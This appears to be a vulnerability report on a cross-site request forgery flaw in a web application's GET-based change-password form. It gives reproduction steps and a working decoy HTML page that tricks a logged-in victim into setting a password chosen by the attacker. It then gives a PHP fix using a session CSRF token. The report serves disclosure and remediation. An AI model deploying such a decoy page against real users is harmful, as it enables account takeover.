Vulnerability
Cross-Site Request Forgery
Description
A forged request is sent from the target's browser while they hold an active session, so the application accepts it as the target's own request and carries out an action they never intended.
Located
Change Password
HTTP request type
GET
Vulnerable parameter / behaviour
The change-password handler treats any request that carries the expected parameters as a legitimate submission of its own form; nothing in the request proves it originated from the application rather than from a third-party page. An attacker can therefore have the victim's browser submit a new password of the attacker's choosing and take over the account.
Payload / actions for reproduction
1. Replicate the change-password form on a page you control, keeping the real action URL and the GET method so that the victim's browser attaches their session cookie when the form is submitted.
2. In your copy, replace the real 'new password' field with a hidden field pre-filled with a password you choose, and show the victim a decoy field instead.
3. Send the link to the user.
4. When the user "changes their password" from your form, the value actually saved is your password, not the one they typed, and you can log in to their account with it.
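The decoy page that steps 1 and 2 describe, written out as an added example (this is not part of the original report or the application's code). The target URL and the parameter name new_password are assumptions for illustration and must be taken from the application's real form; reset=yes mirrors the submit button used by the application's own form.

```html
<!-- Attacker-controlled page. The action URL and the field name new_password are
     assumptions; copy the real ones from the application's change-password form. -->
<!DOCTYPE html>
<html>
<head><meta charset="utf-8"><title>Update your password</title></head>
<body>
  <h1>Security notice: please reset your password</h1>
  <!-- Same action and method as the real form, so the victim's browser sends
       their session cookie with the request when they submit it. -->
  <form action="https://target.example/change_password.php" method="GET">
    <!-- Decoy field: whatever the victim types here is ignored by the server
         because its name does not match the real parameter. -->
    <label>New password <input type="password" name="decoy"></label>
    <!-- The real parameter, hidden and pre-filled with the attacker's value. -->
    <input type="hidden" name="new_password" value="AttackerChosenPassw0rd">
    <!-- Same submit parameter the application's own button sends. -->
    <input type="hidden" name="reset" value="yes">
    <button type="submit">Reset</button>
  </form>
</body>
</html>
```

Because the form is submitted as a top-level GET navigation, browsers that default cookies to SameSite=Lax still attach the session cookie, so that default alone does not stop the attack. GET also means the new password lands in the URL, and from there in browser history, server logs and Referer headers, which is a second reason the fix should move the form to POST in addition to adding the token.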
Code fix
Generate a CSRF token that an attacker cannot predict (random_bytes), store it in the user's session, and echo it into a hidden form field so it is sent back with the request. On submission, reject the request unless the token is present and exactly matches the session copy, and stop processing at that point rather than only issuing a redirect. One token per session is sufficient here: the attacker's page runs on a different origin and cannot read the victim's session token to copy it into the forged form.
<?php
// session_start() is assumed to have been called already.
// Generate the CSRF token once per session, before the form is rendered
// (in the original it was generated after the field was echoed, so the first
// form on a fresh session was sent with an empty token).
if (empty($_SESSION['csrf'])) {
    $_SESSION['csrf'] = bin2hex(random_bytes(32));
}
?>
<input type="hidden" name="csrf" value="<?php echo htmlspecialchars($_SESSION['csrf'], ENT_QUOTES, 'UTF-8'); ?>">
<button type="submit" name="reset" value="yes">Reset</button>

<?php
// On submission: the token must be present and match the session copy.
// hash_equals is a constant-time string comparison; a loose != would also allow
// PHP type juggling. $_GET matches the form's current method, but the form should
// be switched to POST so the new password does not travel in the URL.
if (!isset($_GET['csrf']) || !hash_equals($_SESSION['csrf'], (string) $_GET['csrf'])) {
    // Assuming the request is forged, so we're logging them out
    header("Location: ../logout.php");
    exit; // without exit the script keeps running and the password is changed anyway
}